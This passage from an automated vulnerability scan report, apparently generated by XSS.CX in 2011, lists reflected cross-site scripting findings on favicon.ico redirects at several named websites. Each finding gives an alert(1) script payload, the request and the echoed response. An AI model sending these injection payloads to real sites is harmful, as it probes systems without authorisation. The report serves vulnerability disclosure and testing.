Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Thu, 31 Mar 2011 20:33:20 GMT
Content-Type: text/html
Content-Length: 351
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?4308b"><script>alert(1)</script>a443b43ef30=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?4308b"><script>alert(1)</script>a443b43ef30=1">
</head>
<body><h1>Object Moved</h1>This docum
...[SNIP]...
<a href="http://edge.shop.com/ccimg.shop.com/web/favicon.ico?4308b"><script>alert(1)</script>a443b43ef30=1">
...[SNIP]...

1.159. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopcompanion.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac848"><script>alert(1)</script>82d79a60015 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?ac848"><script>alert(1)</script>82d79a60015=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shopcompanion.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Thu, 31 Mar 2011 20:48:08 GMT
Content-Type: text/html
Content-Length: 351
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?ac848"><script>alert(1)</script>82d79a60015=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?ac848"><script>alert(1)</script>82d79a60015=1">
</head>
<body><h1>Object Moved</h1>This docum
...[SNIP]...
<a href="http://edge.shop.com/ccimg.shop.com/web/favicon.ico?ac848"><script>alert(1)</script>82d79a60015=1">
...[SNIP]...

1.160. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopcompanion.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 3b792><script>alert(1)</script>70fe5a6514e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?3b792><script>alert(1)</script>70fe5a6514e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shopcompanion.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Thu, 31 Mar 2011 20:48:08 GMT
Content-Type: text/html
Content-Length: 349
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?3b792><script>alert(1)</script>70fe5a6514e=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?3b792><script>alert(1)</script>70fe5a6514e=1">
</head>
<body><h1>Object Moved</h1>This docume
...[SNIP]...

1.161. http://www.tangle.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tangle.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4eea4<script>alert(1)</script>5dcabf655e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?4eea4<script>alert(1)</script>5dcabf655e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tangle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 21:56:25 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 271
Location: http://www.godtube.com/favicon.ico?4eea4<script>alert(1)</script>5dcabf655e=1#alertbar

<html><body>The requested resource was moved. It could be found here: <a href="http://www.godtube.com/favicon.ico?4eea4<script>alert(1)</script>5dcabf655e=1#alertbar">http://www.godtube.com/favicon.ico?4eea4<script>alert(1)</script>5dcabf655e=1#alertbar</a>
...[SNIP]...

1.162. http://www.tangle.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tangle.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8503"><script>alert(1)</script>da2d2489d32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?b8503"><script>alert(1)</script>da2d2489d32=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tangle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 21:56:25 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 277
Location: http://www.godtube.com/favicon.ico?b8503"><script>alert(1)</script>da2d2489d32=1#alertbar

<html><body>The requested resource was moved. It could be found here: <a href="http://www.godtube.com/favicon.ico?b8503"><script>alert(1)</script>da2d2489d32=1#alertbar">http://www.godtube.com/favicon
...[SNIP]...

1.163. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.townhall.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2ebc1<script>alert(1)</script>46f88b55933 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?2ebc1<script>alert(1)</script>46f88b55933=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.townhall.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/html
Date: Thu, 31 Mar 2011 20:51:37 GMT
Location: http://townhall.com/favicon.ico?2ebc1<script>alert(1)</script>46f88b55933=1
Pragma: no-cache
X-PoolName:
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 249

<html><body>The requested resource was moved. It could be found here: <a href="http://townhall.com/favicon.ico?2ebc1<script>alert(1)</script>46f88b55933=1">http://townhall.com/favicon.ico?2ebc1<script>alert(1)</script>46f88b55933=1</a>
...[SNIP]...

1.164. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.townhall.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 582da"><script>alert(1)</script>c977a78f916 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?582da"><script>alert(1)</script>c977a78f916=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.townhall.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/html
Date: Thu, 31 Mar 2011 20:51:38 GMT
Location: http://townhall.com/favicon.ico?582da"><script>alert(1)</script>c977a78f916=1
Pragma: no-cache
X-PoolName:
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 253

<html><body>The requested resource was moved. It could be found here: <a href="http://townhall.com/favicon.ico?582da"><script>alert(1)</script>c977a78f916=1">http://townhall.com/favicon.ico?582da"><sc
...[SNIP]...

Report generated by XSS.CX at Thu Mar 31 18:33:35 CDT 2011.